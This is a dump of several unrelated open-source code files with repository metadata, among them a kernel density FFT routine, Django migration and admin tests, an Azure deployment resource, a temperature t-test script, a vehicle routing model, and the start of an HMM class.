Journal of the Royal Statistical Society. Series C. 33.1, 120-2.
Silverman, B.W. (1982) `Algorithm AS 176. Kernel density estimation using
    the Fast Fourier Transform`. Journal of the Royal Statistical Society.
Series C. 31.2, 93-9.
"""
X = np.asarray(X)
X = X[np.logical_and(X > clip[0], X < clip[1])] # will not work for two columns.
# will affect underlying data?
# Get kernel object corresponding to selection
kern = kernel_switch[kernel]()
try:
bw = float(bw)
    except (ValueError, TypeError):
bw = bandwidths.select_bandwidth(X, bw, kern) # will cross-val fit this pattern?
bw *= adjust
nobs = len(X) # after trim
# 1 Make grid and discretize the data
if gridsize is None:
gridsize = np.max((nobs, 512.))
gridsize = 2**np.ceil(np.log2(gridsize)) # round to next power of 2
a = np.min(X) - cut * bw
b = np.max(X) + cut * bw
grid,delta = np.linspace(a, b, int(gridsize), retstep=True)
RANGE = b - a
#TODO: Fix this?
# This is the Silverman binning function, but I believe it's buggy (SS)
# weighting according to Silverman
# count = counts(X,grid)
# binned = np.zeros_like(grid) #xi_{k} in Silverman
# j = 0
# for k in range(int(gridsize-1)):
# if count[k]>0: # there are points of X in the grid here
# Xingrid = X[j:j+count[k]] # get all these points
# # get weights at grid[k],grid[k+1]
# binned[k] += np.sum(grid[k+1]-Xingrid)
# binned[k+1] += np.sum(Xingrid-grid[k])
# j += count[k]
# binned /= (nobs)*delta**2 # normalize binned to sum to 1/delta
#NOTE: THE ABOVE IS WRONG, JUST TRY WITH LINEAR BINNING
binned = fast_linbin(X, a, b, gridsize) / (delta * nobs)
# step 2 compute FFT of the weights, using Munro (1976) FFT convention
y = forrt(binned)
# step 3 and 4 for optimal bw compute zstar and the density estimate f
# do not have to redo the above if just changing bw, ie., for cross val
#NOTE: silverman_transform is the closed form solution of the FFT of the
#gaussian kernel. Not yet sure how to generalize it.
zstar = silverman_transform(bw, gridsize, RANGE)*y # 3.49 in Silverman
# 3.50 w Gaussian kernel
f = revrt(zstar)
if retgrid:
return f, grid, bw
else:
return f, bw
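# Editor's summary of the FFT pipeline above (a sketch, not statsmodels
# documentation): the estimate is obtained by
#   1. linear-binning the observations onto a power-of-two grid (fast_linbin),
#   2. taking the forward real FFT of the binned weights (forrt),
#   3. damping each Fourier coefficient by the closed-form transform of the
#      Gaussian kernel at bandwidth bw (silverman_transform), and
#   4. inverting the FFT (revrt) to recover the density on the grid.
# Because step 3 is kernel-specific, only the Gaussian kernel is supported.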
if __name__ == "__main__":
import numpy as np
np.random.seed(12345)
xi = np.random.randn(100)
f,grid, bw1 = kdensity(xi, kernel="gau", bw=.372735, retgrid=True)
f2, bw2 = kdensityfft(xi, kernel="gau", bw="silverman",retgrid=False)
# do some checking vs. silverman algo.
# you need denes.f, http://lib.stat.cmu.edu/apstat/176
#NOTE: I (SS) made some changes to the Fortran
# and the FFT stuff from Munro http://lib.stat.cmu.edu/apstat/97o
# then compile everything and link to denest with f2py
#Make pyf file as usual, then compile shared object
#f2py denest.f -m denest2 -h denest.pyf
#edit pyf
#-c flag makes it available to other programs, fPIC builds a shared library
#/usr/bin/gfortran -Wall -c -fPIC fft.f
#f2py -c denest.pyf ./fft.o denest.f
try:
from denest2 import denest # @UnresolvedImport
a = -3.4884382032045504
b = 4.3671504686785605
RANGE = b - a
bw = bandwidths.bw_silverman(xi)
ft,smooth,ifault,weights,smooth1 = denest(xi,a,b,bw,np.zeros(512),np.zeros(512),0,
np.zeros(512), np.zeros(512))
# We use a different binning algo, so only accurate up to 3 decimal places
np.testing.assert_almost_equal(f2, smooth, 3)
#NOTE: for debugging
# y2 = forrt(weights)
# RJ = np.arange(512/2+1)
# FAC1 = 2*(np.pi*bw/RANGE)**2
# RJFAC = RJ**2*FAC1
# BC = 1 - RJFAC/(6*(bw/((b-a)/M))**2)
# FAC = np.exp(-RJFAC)/BC
# SMOOTH = np.r_[FAC,FAC[1:-1]] * y2
# dens = revrt(SMOOTH)
except:
# ft = np.loadtxt('./ft_silver.csv')
# smooth = np.loadtxt('./smooth_silver.csv')
print("Did not get the estimates from the Silverman algorithm")
| 33.662409
| 90
| 0.596032
|
e9337abe06d52be9cadfc15c31642a3d078896b6
| 512
|
py
|
Python
|
quiz_api/quizzes/migrations/0015_auto_20201130_0344.py
|
vldslv/quiz_api
|
64e5f0f6fe03a532e21409940ad3890eaab8052a
|
[
"BSD-3-Clause"
] | null | null | null |
quiz_api/quizzes/migrations/0015_auto_20201130_0344.py
|
vldslv/quiz_api
|
64e5f0f6fe03a532e21409940ad3890eaab8052a
|
[
"BSD-3-Clause"
] | null | null | null |
quiz_api/quizzes/migrations/0015_auto_20201130_0344.py
|
vldslv/quiz_api
|
64e5f0f6fe03a532e21409940ad3890eaab8052a
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 2.2.1 on 2020-11-30 00:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('quizzes', '0014_question_answer_type'),
]
operations = [
migrations.AlterField(
model_name='question',
name='answer_type',
field=models.IntegerField(choices=[(1, 'Текстовое поле'), (2, 'Выбор одного варианта'), (3, 'Множественный выбор')], default=1, verbose_name='Тип ответа'),
),
]
| 26.947368
| 167
| 0.625
|
55fbfeb7bbd0d691b5fefb56fba286cb0f4976f1
| 12,477
|
py
|
Python
|
ramp-frontend/ramp_frontend/tests/test_admin.py
|
frcaud/ramp-board
|
3df90e51a4faeb0c03bab5dc13e12311807a618e
|
[
"BSD-3-Clause"
] | null | null | null |
ramp-frontend/ramp_frontend/tests/test_admin.py
|
frcaud/ramp-board
|
3df90e51a4faeb0c03bab5dc13e12311807a618e
|
[
"BSD-3-Clause"
] | null | null | null |
ramp-frontend/ramp_frontend/tests/test_admin.py
|
frcaud/ramp-board
|
3df90e51a4faeb0c03bab5dc13e12311807a618e
|
[
"BSD-3-Clause"
] | null | null | null |
import re
import shutil
import pytest
from werkzeug.datastructures import ImmutableMultiDict
from ramp_utils import generate_flask_config
from ramp_utils import read_config
from ramp_utils.testing import database_config_template
from ramp_utils.testing import ramp_config_template
from ramp_database.model import Model
from ramp_database.testing import create_toy_db
from ramp_database.utils import setup_db
from ramp_database.utils import session_scope
from ramp_database.tools.event import get_event
from ramp_database.tools.user import add_user
from ramp_database.tools.user import get_user_by_name
from ramp_database.tools.team import ask_sign_up_team
from ramp_database.tools.team import get_event_team_by_name
from ramp_frontend import create_app
from ramp_frontend.testing import login_scope
@pytest.fixture(scope="module")
def client_session(database_connection):
database_config = read_config(database_config_template())
ramp_config = ramp_config_template()
try:
deployment_dir = create_toy_db(database_config, ramp_config)
flask_config = generate_flask_config(database_config)
app = create_app(flask_config)
app.config["TESTING"] = True
app.config["WTF_CSRF_ENABLED"] = False
with session_scope(database_config["sqlalchemy"]) as session:
yield app.test_client(), session
finally:
shutil.rmtree(deployment_dir, ignore_errors=True)
try:
# In case of failure we should close the global flask engine
from ramp_frontend import db as db_flask
db_flask.session.close()
except RuntimeError:
pass
db, _ = setup_db(database_config["sqlalchemy"])
Model.metadata.drop_all(db)
@pytest.mark.parametrize(
"page",
[
"/approve_users",
"/manage_users",
"/sign_up/test_user",
"/events/iris_test/sign_up/test_user",
"/events/iris_test/update",
"/user_interactions",
"/events/iris_test/dashboard_submissions",
],
)
def test_check_login_required(client_session, page):
client, _ = client_session
rv = client.get(page)
assert rv.status_code == 302
assert "http://localhost/login" in rv.location
rv = client.get(page, follow_redirects=True)
assert rv.status_code == 200
@pytest.mark.parametrize(
"page, request_function",
[
("/approve_users", ["get", "post"]),
("/manage_users", ["get"]),
("/sign_up/test_user", ["get"]),
("/events/iris_test/sign_up/test_user", ["get"]),
("/events/iris_test/update", ["get", "post"]),
("/user_interactions", ["get"]),
("/events/iris_test/dashboard_submissions", ["get"]),
],
)
def test_check_admin_required(client_session, page, request_function):
client, _ = client_session
with login_scope(client, "test_user", "test") as client:
for rf in request_function:
rv = getattr(client, rf)(page)
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert (
flash_message["message"] == "Sorry User, you do not have admin rights"
)
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
rv = getattr(client, rf)(page, follow_redirects=True)
assert rv.status_code == 200
def test_approve_users_remove(client_session):
client, session = client_session
# create 2 new users
add_user(session, "xx", "xx", "xx", "xx", "xx", access_level="user")
add_user(session, "yy", "yy", "yy", "yy", "yy", access_level="asked")
# ask for sign up for an event for the first user
_, _, event_team = ask_sign_up_team(session, "iris_test", "xx")
with login_scope(client, "test_iris_admin", "test") as client:
        # GET check that we get all new users to be approved
rv = client.get("/approve_users")
assert rv.status_code == 200
# line for user approval
assert b"yy yy - yy" in rv.data
# line for the event approval
assert b"iris_test - xx"
# POST check that we are able to approve a user and event
data = ImmutableMultiDict(
[
("submit_button", "Remove!"),
("approve_users", "yy"),
("approve_event_teams", str(event_team.id)),
]
)
rv = client.post("/approve_users", data=data)
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
        # ensure that the previous changes have been committed within our
# session
session.commit()
user = get_user_by_name(session, "yy")
assert user is None
event_team = get_event_team_by_name(session, "iris_test", "xx")
assert event_team is None
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert re.match(
r"Removed users:\nyy\nRemoved event_team:\n"
r"Event\(iris_test\)/Team\(.*xx.*\)\n",
flash_message["Removed users"],
)
def test_approve_users_approve(client_session):
client, session = client_session
# create 2 new users
add_user(session, "cc", "cc", "cc", "cc", "cc", access_level="user")
add_user(session, "dd", "dd", "dd", "dd", "dd", access_level="asked")
# ask for sign up for an event for the first user
_, _, event_team = ask_sign_up_team(session, "iris_test", "cc")
with login_scope(client, "test_iris_admin", "test") as client:
        # GET check that we get all new users to be approved
rv = client.get("/approve_users")
assert rv.status_code == 200
# line for user approval
assert b"dd dd - dd" in rv.data
# line for the event approval
assert b"iris_test - cc"
# POST check that we are able to approve a user and event
data = ImmutableMultiDict(
[
("submit_button", "Approve!"),
("approve_users", "dd"),
("approve_event_teams", str(event_team.id)),
]
)
rv = client.post("/approve_users", data=data)
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
        # ensure that the previous changes have been committed within our
# session
session.commit()
user = get_user_by_name(session, "dd")
assert user.access_level == "user"
event_team = get_event_team_by_name(session, "iris_test", "cc")
assert event_team.approved
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert re.match(
r"Approved users:\ndd\nApproved event_team:\n"
r"Event\(iris_test\)/Team\(.*cc.*\)\n",
flash_message["Approved users"],
)
def test_approve_single_user(client_session):
client, session = client_session
add_user(session, "gg", "gg", "gg", "gg", "gg", access_level="asked")
with login_scope(client, "test_iris_admin", "test") as client:
rv = client.get("/sign_up/gg")
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert re.match(
"User(.*gg.*) is signed up", flash_message["Successful sign-up"]
)
        # ensure that the previous changes have been committed within our
# session
session.commit()
user = get_user_by_name(session, "gg")
assert user.access_level == "user"
rv = client.get("/sign_up/unknown_user")
session.commit()
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert flash_message["message"] == "No user unknown_user"
def test_approve_sign_up_for_event(client_session):
client, session = client_session
with login_scope(client, "test_iris_admin", "test") as client:
# check the redirection if the user or the event does not exist
rv = client.get("/events/xxx/sign_up/test_user")
session.commit()
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert flash_message["message"] == "No event xxx or no user test_user"
rv = client.get("/events/iris_test/sign_up/xxxx")
session.commit()
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert flash_message["message"] == "No event iris_test or no user xxxx"
add_user(session, "zz", "zz", "zz", "zz", "zz", access_level="user")
_, _, event_team = ask_sign_up_team(session, "iris_test", "zz")
assert not event_team.approved
rv = client.get("/events/iris_test/sign_up/zz")
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
session.commit()
event_team = get_event_team_by_name(session, "iris_test", "zz")
assert event_team.approved
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert "is signed up for Event" in flash_message["Successful sign-up"]
def test_manage_users(client_session):
client, session = client_session
# create 2 new users
add_user(session, "ff", "ff", "ff", "ff", "ff", access_level="user")
add_user(session, "ll", "ll", "ll", "ll", "ll", access_level="asked")
# ask for sign up for an event for the first user
_, _, event_team = ask_sign_up_team(session, "iris_test", "xx")
with login_scope(client, "test_iris_admin", "test") as client:
# GET check that we get all users
rv = client.get("/manage_users")
assert rv.status_code == 200
# assert b'yy yy - yy' in rv.data
def test_update_event(client_session):
client, session = client_session
with login_scope(client, "test_iris_admin", "test") as client:
# in case that the event does not exist
rv = client.get("/events/boston_housing/update")
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert 'no event named "boston_housing"' in flash_message["message"]
# GET: pre-fill the forms
rv = client.get("/events/iris_test/update")
assert rv.status_code == 200
assert b"Minimum duration between submissions" in rv.data
# POST: update the event data
event_info = {
"suffix": "test",
"title": "Iris new title",
"is_send_trained_mail": True,
"is_public": True,
"is_controled_signup": True,
"is_competitive": False,
"min_duration_between_submissions_hour": 0,
"min_duration_between_submissions_minute": 0,
"min_duration_between_submissions_second": 0,
"opening_timestamp": "2000-01-01 00:00:00",
"closing_timestamp": "2100-01-01 00:00:00",
"public_opening_timestamp": "2000-01-01 00:00:00",
}
rv = client.post("/events/iris_test/update", data=event_info)
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
event = get_event(session, "iris_test")
assert event.min_duration_between_submissions == 0
def test_user_interactions(client_session):
client, _ = client_session
with login_scope(client, "test_iris_admin", "test") as client:
rv = client.get("/user_interactions")
assert rv.status_code == 200
assert b"landing" in rv.data
# TODO: To be tested when we implemented properly the leaderboard
# def test_dashboard_submissions(client_session):
# client, session = client_session
# with login_scope(client, 'test_iris_admin', 'test') as client:
# rv = client.get('/events/iris_test/dashboard_submissions')
# print(rv.data.decode('utf-8'))
| 37.244776
| 86
| 0.636772
|
cff1dcb38adf56cd273c18181cb3d86cab7ae113
| 2,330
|
py
|
Python
|
mmdet3d/ops/__init__.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 95
|
2021-12-01T07:32:48.000Z
|
2022-03-11T07:12:32.000Z
|
mmdet3d/ops/__init__.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 15
|
2021-12-03T09:56:17.000Z
|
2022-03-07T13:01:12.000Z
|
mmdet3d/ops/__init__.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 21
|
2021-12-02T11:07:55.000Z
|
2022-03-28T15:25:02.000Z
|
from mmcv.ops import (RoIAlign, SigmoidFocalLoss, batched_nms,
                      get_compiler_version, get_compiling_cuda_version, nms,
                      roi_align, sigmoid_focal_loss, soft_nms)
from .ball_query import ball_query
from .furthest_point_sample import (Points_Sampler, furthest_point_sample,
furthest_point_sample_with_dist)
from .gather_points import gather_points
from .group_points import (GroupAll, QueryAndGroup, group_points,
grouping_operation)
from .interpolate import three_interpolate, three_nn
from .knn import knn
from .norm import NaiveSyncBatchNorm1d, NaiveSyncBatchNorm2d
from .paconv import PAConv, PAConvCUDA, assign_score_withk
from .pointnet_modules import (PAConvCUDASAModule, PAConvCUDASAModuleMSG,
PAConvSAModule, PAConvSAModuleMSG,
PointFPModule, PointSAModule, PointSAModuleMSG,
build_sa_module)
from .roiaware_pool3d import (RoIAwarePool3d, points_in_boxes_batch,
points_in_boxes_cpu, points_in_boxes_gpu)
from .sparse_block import (SparseBasicBlock, SparseBottleneck,
make_sparse_convmodule)
from .voxel import DynamicScatter, Voxelization, dynamic_scatter, voxelization
from .rotated_iou import cal_iou_3d, cal_giou_3d
__all__ = [
'nms', 'soft_nms', 'RoIAlign', 'roi_align', 'get_compiler_version',
'get_compiling_cuda_version', 'NaiveSyncBatchNorm1d',
'NaiveSyncBatchNorm2d', 'batched_nms', 'Voxelization', 'voxelization',
'dynamic_scatter', 'DynamicScatter', 'sigmoid_focal_loss',
'SigmoidFocalLoss', 'SparseBasicBlock', 'SparseBottleneck',
'RoIAwarePool3d', 'points_in_boxes_gpu', 'points_in_boxes_cpu',
'make_sparse_convmodule', 'ball_query', 'knn', 'furthest_point_sample',
'furthest_point_sample_with_dist', 'three_interpolate', 'three_nn',
'gather_points', 'grouping_operation', 'group_points', 'GroupAll',
'QueryAndGroup', 'PointSAModule', 'PointSAModuleMSG', 'PointFPModule',
'points_in_boxes_batch', 'get_compiler_version', 'assign_score_withk',
'get_compiling_cuda_version', 'Points_Sampler', 'build_sa_module',
'PAConv', 'PAConvCUDA', 'PAConvSAModuleMSG', 'PAConvSAModule',
'PAConvCUDASAModule', 'PAConvCUDASAModuleMSG'
]
| 55.47619
| 78
| 0.719742
|
f99d30348e5cb78a7bec0884dce2dc7bf7cefd05
| 58
|
py
|
Python
|
scilog/__init__.py
|
soerenwolfers/scilog
|
ca66a6a7b8d267c8f2998b2a935b35b8f95b7558
|
[
"MIT"
] | null | null | null |
scilog/__init__.py
|
soerenwolfers/scilog
|
ca66a6a7b8d267c8f2998b2a935b35b8f95b7558
|
[
"MIT"
] | null | null | null |
scilog/__init__.py
|
soerenwolfers/scilog
|
ca66a6a7b8d267c8f2998b2a935b35b8f95b7558
|
[
"MIT"
] | null | null | null |
from .scilog import record,load,analyze,ConvergencePlotter
| 58
| 58
| 0.87931
|
69980dc4f75401a67140b78148972f2063a9378d
| 2,367
|
py
|
Python
|
HypothesisTesting/TurnOnAC.py
|
teerasitk/DataAnalyticsIOTBootCamp
|
7b0c6d008fc83136878c56b2bff496e61d5656cb
|
[
"MIT"
] | null | null | null |
HypothesisTesting/TurnOnAC.py
|
teerasitk/DataAnalyticsIOTBootCamp
|
7b0c6d008fc83136878c56b2bff496e61d5656cb
|
[
"MIT"
] | null | null | null |
HypothesisTesting/TurnOnAC.py
|
teerasitk/DataAnalyticsIOTBootCamp
|
7b0c6d008fc83136878c56b2bff496e61d5656cb
|
[
"MIT"
] | null | null | null |
import pandas as pd
from scipy.stats import ttest_1samp, t, sem
import matplotlib.pyplot as plt # for plot graph
df_temp = pd.read_csv("../Data/NodeTemperature.csv") # Load the csv file
df_temp.AbsT = pd.to_datetime(df_temp.AbsT)
# convert data-time text into actual datetime list
df_temp = df_temp.set_index("AbsT") # set "AbsT" column as index column
t_scores = [] #empty list
p_values = [] #empty list
significance_level = 0.05 # Type I Error
target_temp = 20.8
for row in range(df_temp.shape[0]):
data = df_temp.iloc[row]
t_score, p_val = ttest_1samp(data, popmean=target_temp)
t_scores.append(t_score)
if t_score < 0:
# Expecting positive t-score if
# temperature is above target_temp
# t-score < 0 indicates that temp is lower
# than the target_temp.
# Thus, change p to 1-p when t-score <0
p_values.append(1 - p_val/2.0)
else:
p_values.append(p_val/2.0) # Divided by 2 since it is 2-tail test
t_crit = t.ppf(1 - significance_level,3) # one-tailed critical value with df = n - 1 = 4 - 1 = 3 (four sensor nodes)
# convert t_scores and p_values into pandas data frame
test_stats = pd.DataFrame({"t_score":t_scores,
"p_value":p_values,
"t_critical":t_crit},
index=df_temp.index)
test_stats.to_csv("TTestFor20_8.csv") # save to file
# plot the t-score and p-value
plt.figure(figsize=(15,8))
plt.subplot(2,1,1)
plt.plot(test_stats.t_score, label="t-score")
plt.plot(test_stats.t_critical, label="5%-Significance Critical Value")
plt.grid()
plt.legend()
plt.subplot(2,1,2)
plt.plot(test_stats.p_value, label="p-value")
plt.grid()
plt.ylim(0,0.2)
plt.yticks([0,0.05,0.1,0.15,0.2])
plt.legend()
plt.show()
#plot the on and off time with node temperatures
alpha = significance_level
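# the AC is considered ON whenever the one-tailed p-value drops below alpha,
# i.e. the mean sensor temperature is significantly above target_temp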
ac_on = (test_stats.p_value < alpha)
plt.figure(figsize=(15,8))
plt.plot(ac_on*1+20.2, label="Ac ON")
plt.plot(df_temp.node1, label="node1")
plt.plot(df_temp.node2, label="node2")
plt.plot(df_temp.node3, label="node3")
plt.plot(df_temp.node4, label="node4")
plt.grid()
plt.xlabel("Time")
plt.title("AC On vs Temperatures")
plt.show()
def makeText(is_on):
if is_on:
return "On"
else:
return "Off"
ac_status = pd.DataFrame({"status": ac_on},
index=df_temp.index)
ac_status.status = ac_status.status.map(makeText)
print(ac_status.head())
ac_status.to_csv("ACStatus.csv")
| 31.56
| 72
| 0.689058
|
1b42e848a314b5e75e704039668bdc7f10ace8c8
| 5,544
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/resources/v20190701/deployment_at_subscription_scope.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/resources/v20190701/deployment_at_subscription_scope.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/resources/v20190701/deployment_at_subscription_scope.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['DeploymentAtSubscriptionScope']
class DeploymentAtSubscriptionScope(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
deployment_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[pulumi.InputType['DeploymentPropertiesArgs']]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Deployment information.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] deployment_name: The name of the deployment.
:param pulumi.Input[str] location: The location to store the deployment data.
:param pulumi.Input[pulumi.InputType['DeploymentPropertiesArgs']] properties: The deployment properties.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if deployment_name is None:
raise TypeError("Missing required property 'deployment_name'")
__props__['deployment_name'] = deployment_name
__props__['location'] = location
if properties is None:
raise TypeError("Missing required property 'properties'")
__props__['properties'] = properties
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:resources/latest:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20180501:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190301:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190501:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190510:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190801:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20191001:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20200601:DeploymentAtSubscriptionScope")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DeploymentAtSubscriptionScope, __self__).__init__(
'azure-nextgen:resources/v20190701:DeploymentAtSubscriptionScope',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DeploymentAtSubscriptionScope':
"""
Get an existing DeploymentAtSubscriptionScope resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return DeploymentAtSubscriptionScope(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
        The location of the deployment.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the deployment.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> pulumi.Output['outputs.DeploymentPropertiesExtendedResponse']:
"""
Deployment properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the deployment.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 44.352
| 746
| 0.670996
|
4f93a93d3ed5d8846880799f10183542f8fb095e
| 1,139
|
py
|
Python
|
problems/g4_world/Vrp.py
|
cprudhom/pycsp3
|
980927188f4262c9ea48a6534795712f09d731d6
|
[
"MIT"
] | null | null | null |
problems/g4_world/Vrp.py
|
cprudhom/pycsp3
|
980927188f4262c9ea48a6534795712f09d731d6
|
[
"MIT"
] | null | null | null |
problems/g4_world/Vrp.py
|
cprudhom/pycsp3
|
980927188f4262c9ea48a6534795712f09d731d6
|
[
"MIT"
] | null | null | null |
"""
See https://en.wikipedia.org/wiki/Vehicle_routing_problem
This model is similar to the one proposed by Jakob Puchinger for the 2009 MiniZinc competition
Example of Execution:
python3 vrp.py -data=Vrp_P-n16-k8.json
"""
from pycsp3 import *
n, capacity, demand, distances = data
# x[i][j] is 1 iff the arc (i,j) is part of a route
x = VarArray(size=[n, n], dom=lambda i, j: {0} if i == j else {0, 1})
# u[i] is the vehicle load after visiting the ith node (used for subtour elimination)
u = VarArray(size=n, dom=lambda i: {0} if i == 0 else range(capacity + 1))
satisfy(
# exactly one incoming arc for each node j other than the depot (node 0)
[Count(x[:, j], value=1) == 1 for j in range(1, n)],
# exactly one outgoing arc for each node i other than the depot (node 0)
[Count(x[i], value=1) == 1 for i in range(1, n)],
# Miller-Tucker-Zemlin subtour elimination
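    # i.e. u[i] - u[j] + capacity * x[i][j] <= capacity - demand[j]: the load must grow by at least
    # demand[j] along every used arc, which rules out any cycle that does not pass through the depot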
[[u[i], u[j], x[i][j]] * [1, -1, capacity] <= capacity - demand[j] for i in range(1, n) for j in range(1, n) if i != j],
# satisfying demand at each node
[u[i] >= demand[i] for i in range(1, n)]
)
minimize(
x * distances
)
| 31.638889
| 124
| 0.646181
|
dda55d9db2391b520b10c77cc12da9ac70edbb71
| 634
|
py
|
Python
|
src/manage.py
|
yurdosii/GroupLinks.api
|
d07e98dda4afe77912df61bdd639f4640ebecce0
|
[
"MIT"
] | null | null | null |
src/manage.py
|
yurdosii/GroupLinks.api
|
d07e98dda4afe77912df61bdd639f4640ebecce0
|
[
"MIT"
] | null | null | null |
src/manage.py
|
yurdosii/GroupLinks.api
|
d07e98dda4afe77912df61bdd639f4640ebecce0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'grouplinks_api.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 28.818182
| 78
| 0.68612
|
4306ddd4702969f8ff46459210adfdb6a5aea8b9
| 2,699
|
py
|
Python
|
pypos/hmm.py
|
palle-k/pypos
|
94276cc483aa84031e4f7797494c489ee875b8db
|
[
"MIT"
] | null | null | null |
pypos/hmm.py
|
palle-k/pypos
|
94276cc483aa84031e4f7797494c489ee875b8db
|
[
"MIT"
] | null | null | null |
pypos/hmm.py
|
palle-k/pypos
|
94276cc483aa84031e4f7797494c489ee875b8db
|
[
"MIT"
] | null | null | null |
import numpy as np
from typing import Optional
class HMM:
def __init__(self, n_states: int, n_emissions: int):
self.n_states = n_states
self.n_emissions = n_emissions
self.transition_prob_: Optional[np.ndarray] = None
self.start_prob_: Optional[np.ndarray] = None
self.emission_prob_: Optional[np.ndarray] = None
def fit(self, x: np.ndarray, y: np.ndarray, l: np.ndarray):
"""
Fits the HMM to the emission sequences with given target sequences
        :param x: Concatenated emission sequences (total length across all sequences)
        :param y: Concatenated hidden-state (target) sequences, aligned with x
        :param l: Lengths of the individual sequences within x and y
:return: Fitted HMM
"""
self.start_prob_ = np.zeros((self.n_states,))
self.emission_prob_ = np.zeros((self.n_states, self.n_emissions))
self.transition_prob_ = np.zeros((self.n_states, self.n_states))
ptrs = [0, *np.cumsum(l)]
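        # ptrs marks sequence boundaries: x[ptrs[k]:ptrs[k + 1]] / y[ptrs[k]:ptrs[k + 1]] is the k-th sequence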
for s in y[ptrs[:-1]]:
self.start_prob_[s] += 1
for ss, se in zip(ptrs[:-1], ptrs[1:]):
obs = x[ss:se] # observation sequence
